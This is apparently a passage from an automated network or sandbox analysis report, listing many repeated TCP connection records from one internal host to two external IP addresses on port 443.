                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
